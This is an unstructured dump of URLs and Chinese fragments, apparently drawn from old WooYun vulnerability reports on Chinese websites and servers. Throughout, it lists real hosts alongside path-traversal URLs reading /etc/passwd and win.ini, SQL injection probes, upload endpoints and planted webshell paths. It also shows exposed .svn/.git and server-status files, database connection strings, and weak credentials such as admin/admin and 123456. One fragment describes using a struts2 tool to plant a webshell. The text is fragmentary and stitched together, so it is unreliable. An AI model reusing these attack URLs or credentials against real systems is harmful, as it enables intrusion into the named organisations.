http://**.**.**.**:8081/tools/SWFUpload/upload.jsp height:20px;BORDER http://zabbix.emar.com/zabbix/zatree/graph.php?hostid=10716 http://**.**.**.**:8080/servlet/FileUploadServlet?fileName=../WEB-INF/proxool.xml http://**.**.**.**/news_list/&newsCategoryId=6.html http://**.**.**/_ http://www.namex.cn/HomeLink/OrderList.aspx http://www.namex.cn/HomeLink/OrderLocate.aspx?id=3213059 http://**.**.**.**/ http://**.**.**.**/posts.php?type=../../../../../../../etc/passwd http://**.**.**.**/posts.php?type=../../../../../../../etc/passwd http://**.**.**.**/print/examregist.aspx?bmid=64576 http://**.**.**.**/print/examregist.aspx?bmid=14576 http://**.**.**.**/print/examregist.aspx?bmid=94576一样有数据 http://**.**.**.**/print/examregist.aspx?bmid=104576 http://cos.sto.cn:89/manager/install/welcome.jsp http://cos.sto.cn/messager/users.data http://cos.sto.cn/login/Login.jsp?logintype=1 http://cos.sto.cn:89/m1/login.do http://cos.sto.cn:89/m1/login.do?message=Login.nouser http://cos.sto.cn:89/m1/login.do?message=Login.pswerror http://cos.sto.cn:89/m1/home.do http://**.**.**.**/bugs/wooyun-2015-0132559 http://pk.tom.com:80/ http://**.**.**.**:8080/x5/portal/login.w http://www1.kugou.com/user/NLoginChenck_1.aspx jdbc:oracle:thin:@**.**.**.**:1521:orcl HH24:mi:ss jdbc:kingbase://localhost:54321/egov HH24:mi:ss jdbc:oracle:thin:@localhost:1521:orcl jdbc:mysql://localhost:13306/egov jdbc:mysql**.**.**.**:13306/egov http://106.187.48.88:9000/admin/products/ http://mail.qiye.163.com/ http://i.auto.sohu.com/user/login/toLogin.at http://**.**.**.**/bugs/wooyun-2010-0123791 http://bug.raiyi.com/my/page http://61.63.13.7/console http://61.63.81.162/console http://61.63.81.162/wls_Server/a.jsp http://m.f.hualongxiang.com:80/view/index/id/2022692 http://**.**.**.**/bugs/wooyun-2010-0115213 http://zabbix.emar.com/zabbix/hostinventories.php?hostid=10451&sid=42605b251c2bee09 http://app.cnfol.com/dataapi/index.php/welcome/hkthpj/205/6/1/id/asc/point_1+/point_2/ http://**.**.**.**/ http://**.**.**.**/console是进不去后台的,只能用http://**.**.**.**:80/console,这是因为做了虚拟主机的原因 http://**.**.**.**:8006/shownews.asp?id=267 http://**.**.**.**:8006/admin/login.asp http://www.ubestchoice.com/newsDetail.php?tid=13&id=28 http://mail.i-vpoints.com zl.zhu/111111 http://**.**.**.**//Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**:100/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://cly.njtech.edu.cn/admin_login.htm http://www.liba.com/m/ http://weixin.wxcrg.com.cn/xapp/login.jsp http://www.bjsto.cn/index.aspx?menuid=3&type=introduct&lanmuid=1&language=cn http://**.**.**.**/cn/detail_t.aspx?Class_ID=86'报错,泄漏sql和绝对路径 http://www.daimayi.com/index.php/Strategy/index/cate_id/2 http://fs.job168.com/df/index.jsp?title= http://hz.job168.com/df/index.jsp?title= http://jm.job168.com/df/index.jsp?title= http://sz.job168.com/df/index.jsp?title= http://zs.job168.com/df/index.jsp?title= http://zh.job168.com/df/index.jsp?title= http://dg.job168.com/df/index.jsp?title= http://qy.job168.com/df/index.jsp?title= http://train.job168.com/df/index.jsp?title= http://e.job168.com/df/index.jsp?title= http://job168.com/df/index.jsp?title= http://hrm.job168.com/df/index.jsp?title= http://hz.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://dg.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://zh.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://english.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://hrm.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://fs.job168.com/train/train_organ.jsp?unit_no=3484202 http://sz.job168.com/train/train_organ.jsp?unit_no=3484202 http://qy.job168.com/train/train_organ.jsp?unit_no=3484202 http://zs.job168.com/train/train_organ.jsp?unit_no=3484202 http://dg.job168.com/train/train_organ.jsp?unit_no=3484202 http://train.job168.com/train/train_organ.jsp?unit_no=3484202 http://jqrc.job168.com/train/train_organ.jsp?unit_no=3484202 http://jnjs.job168.com/train/train_organ.jsp?unit_no=3484202 http://english.job168.com/train/train_organ.jsp?unit_no=3484202 http://job168.com/train/train_organ.jsp?unit_no=3484202 http://e.job168.com/train/train_organ.jsp?unit_no=3484202 http://hrm.job168.com/train/train_organ.jsp?unit_no=3484202 http://e.job168.com/train/searchresult.jsp?course_type=A0000 http://hrm.job168.com/train/searchresult.jsp?course_type=A0000 http://fs.job168.com/schools/pdetail.jsp?talent_no=4743579 http://jm.job168.com/schools/pdetail.jsp?talent_no=4743579 http://sz.job168.com/schools/pdetail.jsp?talent_no=4743579 http://sz.job168.com/schools/school.jsp?school_no=26932302 http://qy.job168.com/schools/school.jsp?school_no=26932302 http://dg.job168.com/schools/school.jsp?school_no=26932302 http://zs.job168.com/schools/school.jsp?school_no=26932302 http://www.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://zh.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://dg.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://zs.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://hz.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://jm.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://sz.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://fs.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://fs.job168.com/schools/show.jsp?school_no=26932302&photo_no=1 http://www.job168.com/schools/news.jsp?info_no=81 http://fs.job168.com/schools/news.jsp?info_no=81 http://hz.job168.com/schools/news.jsp?info_no=81 http://sz.job168.com/schools/news.jsp?info_no=81 http://dg.job168.com/schools/news.jsp?info_no=81 http://qy.job168.com/schools/news.jsp?info_no=81 http://zh.job168.com/schools/news.jsp?info_no=81 http://english.job168.com/person/ceping2012/show_new.jsp?talent_no= http://english.job168.com/paper/e_show.jsp?issue_no=279&page_name= http://e.job168.com/paper/e_show.jsp?issue_no=279&page_name= http://hrm.job168.com/paper/e_show.jsp?issue_no=279&page_name= http://job168.com/paper/e_show.jsp?issue_no=279&page_name= http://**.**.**.**/ls/sp/agentLogin?syskey_request_token=230fc4e2bdc703833b5262b1c7c06493 http://**.**.**.**/jhy/searchAction!search.action http://**.**.**.**/formguide/upload_field.php?uploadtext=wenjian&formid=2&fieldid=58&type=file http://www.hnrczpw.com/gposinfo/freejobs/ztzph http://**.**.**.**/fzb.rar http://**.**.**.**/wwwroot.rar http://**.**.**.**/newsdetail.php?id=DAFAC525-FF42-448D-AC3D-430F5D132AEF&menuid=41&modelid=4 http://**.**.**.**/tu.php?id=42957 ftp://202.108.145.182 http://**.**.**.**/jeeTest/a/bmd/VisDataDef/getVisData?datacode= http://**.**.**.**/sites/main/preview/fb.htm?tid=20140612033900515653364&col_id=17 http://**.**.**.**/admin/newstext.asp?id=524 http://**.**.**.**/login http://**.**.**.**/upload/files/1/a664151e8fcc415fa123fb076b72986d.jsp encap:Ethernet MTU:1500 packets:21969710 packets:3847409 txqueuelen:1000 http://**.**.**.**/c6v32/Jhsoft.Web.login/PassWordSlide.aspx http://**.**.**.** URL:http://mail.cqmu.edu.cn/ http://y1s.cn/index.php?g=admin&m=index&a=mainPage http://**.**.**.**/Skins/Books.aspx?n_lx=7&ParentID=7 http://**.**.**.**/detailNews.jsp?NewsID=2786 http://api.social-touch.com/log/ http://www.crp-md.com/ http://www.crp-md.com:82/FCKeditor/editor/filemanager/connectors/test.html http://job.itpub.net http://job.itpub.net http://mail.bfa.edu.cn/ http://drops.wooyun.org/tips/2031) http://**.**.**.**/index.php/News/search index.php/News/search http://**.**.**.** http://ykt.nchu.edu.cn/pages/xxfb/editor/uploadAction.action http://**.**.**.**/passport/login.aspx http://**.**.**.**/bugs/wooyun-2010-0580 http://**.**.**/cms/cms/infopub/getclick.jspinfoid=1299811948810295&channelcode=A01030303_ http://**.**.**/cms/cms/infopub/getclick.jspinfoid=1241681874944282&channelcode=A011403_ http://**.**.**/cms/cms/infopub/getclick.jspinfoid=1317343604713782&channelcode=A07170505_ http://**.**.**/cms/cms/infopub/getclick.jspinfoid=1408523683056826&channelcode=A13010402_ http://**.**.**/cms/wcmforum/forummain.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/forummain.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/forummain.jspwebappCode=A01&forumName=%CA%D0%C3%F1%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/grouplist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/grouplist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/grouplist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/userlist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/userlist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/userlist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/boardlist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/boardlist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/boardlist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3 http://ocm.itpub.net/ http://ocm.itpub.net/test.php http://wb.yili.com/solr/#/ http://**.**.**.**/site/login http://api.inewsweek.cn/api/api.ring_value_show.php?ring_id=253 http://sqlmap.org http://ci.hotwater.com.cn:80/ci/apps/sys/AccountAction.do?emp_Code=e&method=forgetPassWord http://**.**.**.**/about.php?lanmu=3&id=1 http://**.**.**.**/Data/ http://**.**.**.**/phpmyadmin/ http://**.**.**.**/dzsw/viewOrder.ashx?order_id=20150916000001 http://**.**.**.**/dzsw/viewOrder.ashx?order_id=20150916000002 http://**.**.**.**/dzsw/viewOrder.ashx?order_id=20150916000003 http://www.airkunming.com/user/toForgetPass.html https://**.**.** http://s43.xyfm.niu.xunlei.com/login/coopLogin.do http://**.**.**.** http://jiaoyi.choumei.cn/Login/index.html http://**.**.**.**/CallBoard/CallboardInfo.aspx?id=17 http://**.**.**.**/articleComment.jsp?articleid=69012 https://www.hzjr.com/ https://www.hzjr.com:443/ www.hzjr.com http://community.arm.com/message/31052#31052 http://**.**.**.**/grgjjcx.asp http://www.spider.com.cn/myaccountsafe.html?pagetype=resetpaypassword index.php/house/ajax_top_search_data/?s=0.704752029851079 https://github.com/s3cu1n4/mycode/blob/master/temp/test.txt http://www.allyes.com/case/getinfo?id=11 http://www.firstworldsec.com.hk/FirstWorldSec_aspx/IpoExpress/viewIpoInsight.aspx?LNLId=2267&LangId=2 http://www.firstworldsec.com.hk/FirstWorldSec_aspx/News/viewInfocastNews.aspx?NwsId=2562317&LangId=2 site:url http://www.spider.com.cn/myinfo.html http://**.**.**.**/operation/testip.aspx?id=xxxx&reobj=2# http://**.**.**.**/operation/testip.aspx?id=14030532&reobj=2# http://**.**.**.**/operation/testip.aspx?id=123456&reobj=2# http://**.**.**.**/account/InstallList.aspx?type=3&acc_num=WD0072014080120140831 http://**.**.**.**/account/InstallList.aspx?type=3&acc_num=WD0072014080120140831 http://**.**.**.**/ http://**.**.**.**/pages/jbts/index.shtml http://**.**.**.**/list.aspx?funid=21 http://s/SelectList.aspx?type=1&title=‘ http://**.**.**.**/list.aspx?funid=21 http://**.**.**.**/Login.aspx http://www.cqm.com.cn/cqm/nabudenglu/index.html http://bbs.g.qq.com/forum/queryPageCommentInfo?forum_id=56602&page_no=1&page_size=10&topic_id=2417117197550016&author_id=0&rank_way=5 inurl:my_login.do http://www.doctorjob.com.cn/ http://www.buildjob.net/ http://119.254.70.114/phpmyadmin http://zabbix.ppweb.com.cn/zabbix/ http://**.**.**.**:81/GZPORT/aptitudeQueryAction.do?page=1&method=gridShip http://**.**.**.**/portal/jsp/portal/boatplan/list.jsp?planId=OS1KG0ABEQVFPDLKSAOXV1FZ5XJ1GW1I http://admin.1jiajie.com/v2/index.php?action=login&do=getUserInfo http://**.**.**.**/example/upfile.htm http://**.**.**.**/console/ http://**.**.**.**/ma/ma1.jsp http://**.**.**.**/ma/out.jsp http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/model_item.html?action=list&table=Article&classid=4 http://**.**.**/piw/               国家安全生产监督管理总局某站点_ http://**.**.**/piw/     国家安全生产监督管理总局某站点_ http://**.**.**/          国家安全生产监督管理总局某站点_ http://www.cet.zjut.edu.cn/IndexAction.do http://mail.cdzq.com/webmailgo.php系统 http://khgl.cdzq.com http://khgl.cdzq.com/business!openSearchDetail.action?uid=193299 http://www.xuanhao.com/help/help.php?flbm=0907 http://**.**.**.**/ad.php?adid=1515 http://**.**.**.**/ad.php?adid=1515%20AND%20 http://**.**.**.**/find-password/via-mobile?uid=4 http://**.**.**.**/find-password/via-email?uid=4 http://**.**.**.**/user/order/cancel-order?id=119053 http://x.mobage.cn/public/images/55f990d0adf8c.php http://x.mobage.cn/public/images/55f990d0adf8c.php http://**.**.**.**/expOnline/topic/show_q.jsp?topicid=20 http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/Website/xjlist.jsp?ColumnCode=m0301 http://**.**.**.**/Website/advisoryshow.jsp?id=30948 http://**.**.**.**/uddiexplorer/SearchPublicRegistries.jsp?operator=**.**.**.**:9001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://**.**.**.**/EnterpriseList.aspx http://k3shop.k3cloud.kingdee.com/ http://k3shop.k3cloud.kingdee.com/admin/打开后台地址吓到我了,竟然直接跳转登陆。抓了下密码 http://k3shop.k3cloud.kingdee.com/admin/Marketing/upload.aspx?tempFolder=aspx http://k3shop.k3cloud.kingdee.com/upload/activity/aspx/22.aspx http://www.fali2015.com/ http://www.fali2015.com/phpmyadmin/ http://www.salala.com.cn/cakesearch.php?ptype=FO&cake=67 http://**.**.**.**/quotation/common/tb/UINotify3502.jsp?ProposalNo=905012015000001005824 http://**.**.**.**/quotation/common/pg/UIEndorsePtextShow.jsp?BizNo=70507201535060100006301 http://**.**.**.**/quotation/CommonViewTrace.do?BusinessNo=70501201535060100584401 http://**.**.**.**/quotation/CommonViewTrace.do?BusinessNo=70501201535060100584401* http://**.**.**.**/quotation/common/pg/UIEndorsePtextShow.jsp?BizNo=70507201535060100006301* http://**.**.**.**/quotation/common/tb/UINotify3502.jsp?ProposalNo=905012015000001005824* http://**.**.**.**/console/login.jsp?cs=2 http://life.renren.com/show/ http://page.renren.com/602123308/admin http://page.renren.com/admininvite/send2Email http://www.imooc.com/view/422 http://www.intime.com.cn:8000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini http://mos.wxchina.com/ ip:211.147.239.62 in:file http://106.38.180.57:8080/.svn/entries http://106.39.244.203/.git/index http://agent.talk99.cn/admin/login.jsp http://**.**.**.**/ http://**.**.**.**/quotation/0501/tbcbpg/UIPrPoEn0501ClaimShowInfo.jsp?claimno=505012014350101004501 http://**.**.**.**/quotation/0501/tbcbpg/UIPrPoEn0501Show.jsp?BIZTYPE=POLICY&BizNo=805012015350101000262&SHOWTYPE=SHOW&RiskCode=0501&SysCode=prpall user:admin http://account.pcjoy.cn/ http://www.dfsyqc.com/syfw/Notice/new_detail.asp?id=1061 http://duia.com/ http://106.39.118.131/ http://106.39.118.131/aaa.jpg http://**.**.**.**/Admin/Public/login.html user:admin pass:admin http://**.**.**.**/xzspjs.aspx?dep=ggzf http://**.**.**.**/guzhulianmeng/lianmeng.asp?us http://nc.zto.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://122.195.190.234/fybx/newLoginEmp.action http://**.**.**.**:8080/ http://**.**.**.**:8080/ http://**.**.**.**:8080/ http://**.**.**.**:8080/ http://**.**.**.**:8080/ http://cjcx.czu.edu.cn/cjcxjg.asp http://**.**.**.**/weixin/index.php?r=userBind/bindUserInfo&refferUrl=%2Fweixin%2Findex.php%3Fr%3Daviation%2Forder http://mail.ch.com/ http://**.**.**.**:8080/pages/dept/dept_list.jsp?userId=1 http://**.**.**.**/ http://king.sanguosha.com/signup/sfzcom.php http://www.jstnjt.com/ http://www.jstnjt.com/manager/Admin/Login.asp http://www.gomesell.com/ http://mail.china-sss.com:3000/ http://baidu.acmcoder.com/cand/login http://etc.cmu.edu.cn/ylx/lianxi_x.asp?zid=1 http://mail.tfzq.com/ http://**.**.**.**/commodity/kd/ http://fund.pingan.com/uddiexplorer/SetupUDDIExplorer.jsp http://one.pingan.com/uddiexplorer/SetupUDDIExplorer.jsp http://114.251.20.5:8080/seeyon/index.jsp com:8080 http://oa.crpcg.com:8080 cn:8085 http://**.**.**/pg/newpage/login.aspx http://211.151.3.11 http://**.**.**.**/cn/plugin.php?id=hwdownload&mod=detail&mid=144 http://**.**.**.**/DBWechat/weixin/network.do http://**.**.**.**/DBWechat/weixin/network.do http://www.iliangcang.com/i/goods/?act=checkGoodsAmount&attr_keys=-1 http://sh.niu.com/ http://vm.qichelive.com/default.aspx http://vm.qichelive.com/pics.aspx user:admin http://oa.yurun.com/tools/SWFUpload/upload.jsp height:20px;BORDER http://oa.yurun.com/null023.jsp,如下图: https://www.xzbao.com/index.php?user&q=action/reg&type=clear http://**.**.**.**:85/ http://**.**.**.**/ http://**.**.**.**/login/Login.jsp?logintype=1&gopage=&message=17 http://**.**.**.**//weaver/weaver.email.FileDownloadLocation?fileid=10 http://**.**.**.**//weaver/weaver.email.FileDownloadLocation?fileid=41&download=1 jdbc:oracle:thin:@**.**.**.**:1521:CUSPCWDB1 http://**.**.**.**/Login.aspx登录地址 https://eip.fubon.com.cn/ https://eip.fubon.com.cn/Login.aspx http://**.**.**.**//admin/login/checklogin jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl http://www.crclogic.com http://www.crclogic.com/admin/ http://www.dfsyqc.com/syfw/simplenew.asp https://vpn.cctv.net.cn/ http://hrt.cctv.net.cn/tms/打开一看action,直接上struts2利用工具写上马儿 http://172.16.0.30/Ams/ jdbc:oracle:thin:@**.**.**.**:1521:center http://**.**.**.** http://**.**.**.**/webadmin或者是 http://**.**.**.** http://**.**.**.** http://www.starnetuc.com/ http://www.starnetuc.com/wp-admin/ http://baom.jinri.cn/Product/productdetail.aspx?ProductId=41 http://dc.jinri.net.cn/RequestListenerService.aspx http://{0}/LoadBalancing.ashx?SectionName={1 http://114.80.69.231:15888/SpecialSearch.ashx http://114.80.69.233/Alipay_DJP_Notify.aspx http://114.80.69.233/Alipay_DJP_Refund.aspx http://114.80.69.233:81/KqResult.aspx http://staff.uestc.edu.cn/staff.zip http://**.**.**.**:85/ http://**.**.**.**/ www.dfsyqc.com http://**.**.**.**/InfoPage/ShowAnno.aspx?AnnoID=7871&UrlType=1 http://**.**.**.**/InfoPage/ShowAnno.aspx?AnnoID=4101&UrlType=1&SiteItem=43 http://**.**.**.**/InfoPage/ShowAnno.aspx?AnnoID=344&UrlType=1 http://**.**.**.**/InfoPage/ShowAnno.aspx?AnnoID=7087&UrlType=1 http://**.**.**.**/InfoPage/QZLXInfoList.aspx?SiteItem=20 http://**.**.**.**/InfoPage/QZLXInfoList.aspx?SiteItem=20 http://**.**.**.**/InfoPage/QZLXInfoList.aspx?SiteItem=20 http://**.**.**.**/InfoPage/QZLXInfoList.aspx?SiteItem=20 http://**.**.**.**/InfoPage/Form_OnlineExchange.aspx?SitemID=156 http://**.**.**.**/InfoPage/Form_OnlineExchange.aspx?SitemID=156 http://**.**.**.**/InfoPage/Form_OnlineExchange.aspx?SitemID=156 http://**.**.**.**/InfoPage/Form_OnlineExchange.aspx?SitemID=156 http://**.**.**.**/InfoPage/Form_Margin.aspx?SiteItem=157 http://**.**.**.**/InfoPage/Form_Margin.aspx?SiteItem=157 http://**.**.**.**/InfoPage/Form_Margin.aspx?SiteItem=157 http://**.**.**.**/InfoPage/InfoPage/Form_Margin.aspx?SiteItem=157 http://oa.998.com/ http://oa.998.com/messager/users.data svnserve://180.153.191.52:3690 http://admin.cloud.360.cn/ http://api.cloud.360.cn http://**.**.**.**/search.asp?KeyWord= http://life.pingan.com/uddiexplorer/SetupUDDIExplorer.jsp http://bank.pingan.com/uddiexplorer/SetupUDDIExplorer.jsp http://www.wooyun.org/bugs/wooyun-2015-0141883/trace/b28f7a43e2caba0204ea484620804388 http://super.tgbus.com http://**.**.**.**:89/ URl:http://**.**.**.**/www/index.do http://**.**.**.**//www/noticelist.do http://**.**.**.**/bugs/wooyun-2010-0129038 http://**.**.**.**/news.php https://www.xzbao.com http://jue.so/RetrievePassword.php http://jue.so/RetrievePassword.php?Type=3 http://**.**.**.**/bm_zwxx_info.aspx?bid=133321&zwid=12223&cflag=zgsc URL:http://**.**.**.**/ http://**.**.**.**/ http://subject.ourgame.com/2009/FactionInfo/Query.aspx http://202.101.244.46:86/Modules/EnrollManagement/Matriculate/EnrollMatriculateQuery.aspx txbKsh:111 http://www.evideo-smart.com/ http://www.evideo-smart.com/admin/login.aspx http://**.**.**.**/Operation/testip.aspx?id=13456056&reobj=2 http://**.**.**.**/account/Installshow.aspx?id=12177265 http://**.**.**.**/account/maintenanceshow.aspx?id=5668544 http://**.**.**.**/commodity/servicio/nostandardserv/realNameRegister/viewUploadImage.jsps?fielPath=/../../../../../../../../../../../etc/passwd&t=1442562485506 http://**.**.**.**/Account/SearchUserInfo http://**.**.**.**/Account/SearchUserInfo http://**.**.**.**/Account/SearchUserInfo http://**.**.**.**/Account/SearchUserInfo http://**.**.**.**/Account/SearchUserInfo coding:utf-8 http://admin.spider.com.cn/spider2/admin/login_manager.jsp?oid=login http://**.**.**.**/dealers/trainmanage/PrintPreview.aspx?planId=20150465250011&applyId=2015042482 http://**.**.**.**/librarian/news/view-news.asp?ID=93 http://**.**.**.**/xwyd/news/js.asp?classid=6&nclassid=12 http://excsoft.mychery.com/CherySIS/ywxx_json/ywxxNotReadNumAction.action http://112.126.78.148/index.php?r=site/login http://mail.zzvcom.com/ http://**.**.**.**/center/login/LoginRegisterLogic.htm?m=query&f=customerLogin libo:libo弱口令登入 http://116.6.66.143/applymain.aspx http://**.**.**.**/bugs/wooyun-2015-0101950 http://**.**.**.**/etan2010/ http://**.**.**.**/etan2010/works_data_list.php?class_id=24 http://**.**.**.**/site_item_list_1.php?site_map_item_id=25 http://**.**.**.**/site_item_list_2.php?site_map_item_id=54 http://**.**.**.**/site_item_list_3.php?site_map_item_id=108 http://**.**.**.**/site_item_list_5.php?site_map_item_id=103 http://**.**.**.**/site_item_list_6.php?site_map_item_id=98 http://**.**.**.**/site_item_list_7.php?site_map_item_id=25 http://**.**.**.**/site_item_content_1.php?site_map_item_id=5 http://**.**.**.**/site_item_content_2.php?site_map_item_id=104 http://**.**.**.**/site_item_content_3.php?site_map_item_id=510 http://**.**.**.**/site_item_content_5.php?site_map_item_id=110 http://**.**.**.**/site_item_content_6.php?site_map_item_id=99 http://**.**.**.**/site_item_content_7.php?site_map_item_id=5 http://**.**.**.**/e_paper/epaper_list.php?class_id=2 http://**.**.**.**/e_paper/epaper.php?main_id=49 http://**.**.**.**/activity/mem_login.php?event_id=352 http://**.**.**.**/activity/event_reg_list.php?event_id=351 http://**.**.**.**/activity/event_news_list.php?event_id=264 http://**.**.**.**/activity/event_news_detail.php?event_id=352 http://**.**.**.**/event_photo_list.php?event_id=352 http://**.**.**.**/event_photo_view.php?event_photo_pic=1 http://**.**.**.**/website/credit/credit_enterprise_detail.jsp?id=2031 http://**.**.**.**/website/market/market_build_detail.jsp?record_id=710%27%20and%20%271%27=%271 http://**.**.**.**/website/human_rs/module/enterprise_detail.jsp?enterprise_id=13047%27%20and%20%271%27=%271 http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/user/edituseraddress.aspx?aid=82810 index.php/Login/index.html http://**.**.**.**/zwpt/cppic22.asp?id=1 http://**.**.**.**/zwpt/shownews.asp?id=6203&xxfl=10 http://**.**.**.**/zwpt/xxgd.asp?xxfl=10 http://211.151.3.11/lms/index.php?s=Index/Index/login http://**.**.**.**/ http://**.**.**.**/xml/ http://**.**.**.**/upload/upimg/ http://**.**.**.**/include/ http://**.**.**.**/download/ http://**.**.**.**/data/ http://**.**.**.**/ http://**.**.**.**/homepage/LoginHomepage.jsp?hpid=1&opt=privew http://101.227.253.90:8080/ http://**.**.**.**/bugs/wooyun-2010-0129269前辈链接 http://**.**.**.**/xw_view.asp?id=237 http://**.**.**.**/index.php?controller=szck&action=show&id=7&type=bszn http://182.92.225.109:9999/management/ PASSWORD:123456 http://dist.21cn.com:8088/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://dist.21cn.com:8088/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.29.5.24 URL:http://fenxiao.lvmama.com/ http://**.**.**.**:8081/appfront/user/findPasswordValidate.action http://**.**.**.**:8081/appfront/user/regValidate.action http://**.**.**.**:8081/appfront/user/regValidate.action http://data.1jiajie.com/user.html URL:http://**.**.**.**:9080/sys/main.action http://nb.**.**.**.**:10040 http://**.**.**.**:81/admin/user/user_info.jsp http://nb.**.**.**.**:10040/bugfree http://nb.**.**.**.**:10000/ http://svn.**.**.**.**/svn/ http://iwatchome.tom.com/News_QA.php?seqno=4&RadioGroup1=Zenith%20El%20Primero http://iwatchome.tom.com/WatchView_QA.php?seqno=4&RadioGroup1=Zenith%20El%20Primero http://iwatchome.tom.com/News_QA.php?seqno=4&RadioGroup1=Zenith%20El%20Primero http://pan.baidu.com/s/1bnseDiv http://**.**.**.**/schoolAction!to_view.action?entity.id=4a4b50bb4fd3e64a014fdfd972ae004d http://**.**.**.**/userAction!to_subSystem.action?subSystem=resourceSystem http://fenxiao.lvmama.com/reg.jsp http://fenxiao.lvmama.com http://cme.cdwsw.91huayi.com/ http://www.91huayi.com/ http://cqwsw.91huayi.com/Page/InfoView.aspx?lm=ZCXX&id=116* http://cqwsw.91huayi.com/SysAdmin/login.aspx http://cqwsw.91huayi.com/FilePool/AttachFile/config.aspx http://cqwsw.91huayi.com/FilePool/x.aspx http://new.citsbj.com/member/findpwd http://yjs.nwu.edu.cn/eyschool/xcbd_content.php?id=1 http://yjs.nwu.edu.cn/eyschool/hf.php?id1=73 http://geology.nwu.edu.cn:81/jxyd/models/cn/deans/view.asp http://zs.jxau.edu.cn/showpic.php?id=1 http://fenxiao.lvmama.com http://**.**.**.**/content.asp?id=7652 http://**.**.**.**/content.asp?id=7652-1 http://tg.zhengjin99.com:80/ http://103.255.93.13/server-status http://103.255.93.9/server-status http://103.255.93.10/server-status http://card.suning.com/server-status http://mp.suning.com/server-status http://103.255.93.15/server-status http://103.255.93.16/server-status http://103.255.93.17/server-status http://103.255.93.117/server-status http://103.255.93.111/server-status http://103.255.93.119/server-status http://103.255.93.103/.bashrc http://www.wooyun.org/bug.php?action=view&id=5896 http://**.**.**.**/payment/ http://**.**.**.**/cmxlogin.php http://**.**.**.**/news/index.jsp中国电信股份有限公司北京研究院 http://**.**.**.**:8080/login.html http://wspx.91huayi.com/secure/login.aspx URL:http://**.**.**.**:80/news_list.php?page=1&tid=1'%22 http://**.**.**.**/phpinfo.php http://office.mingyi.com.cn/txl/manage/login.aspx https://vpn.bcia.com.cn/ http://10.40.2.63/Page/Main/index.php http://www.wabuw.com/search-line/?keyword=大连 http://report.changyou.com/tessar/,如图所示: http://report.changyou.com/tessar/.svn/entries,如图所示: http://report.changyou.com/tessar/html_tessar_tconfig/StartAnalyze.html http://report.changyou.com/tessar/html_tessar_tconfig/HardInfoSerial.html如图所示: http://report.changyou.com/tessar/html_tessar_tconfig/tConfigMap.html,如图所示: http://report.changyou.com/tessar/html_tessar_crash/CrashAnalyze.html,如图所示: POST:http://hyuser.91huayi.com/ashx/getUserInfo.ashx http://**.**.**.**:10000/console/login/LoginForm.jsp http://**.**.**.**:10000/test/da.jsp http://**.**.**.**:10000/reduh/1.jsp http://**.**.**.**:10000/reduh/1.jsp http://auto.ynet.com/cgi/newslist.php?dir=101 http://auto.ynet.com/cgi/news.php?id=532927 http://auto.ynet.com/cgi/subbrand.php?subid=44 http://auto.ynet.com/cgi/configuration.php?subid=44 http://m.hongkongairlines.com/ index.php/state/analysisnew http://**.**.**.**/Gjj_Serach/Gjj_login.asp http://newoa.glsc.com.cn:8082/names.nsf?Login http://lib.nwnu.edu.cn/librarian/news/manage.asp http://**.**.**.**/index.asp http://**.**.**.**:8080/ http://**.**.**.**:8080/secure/Signup!default.jspa 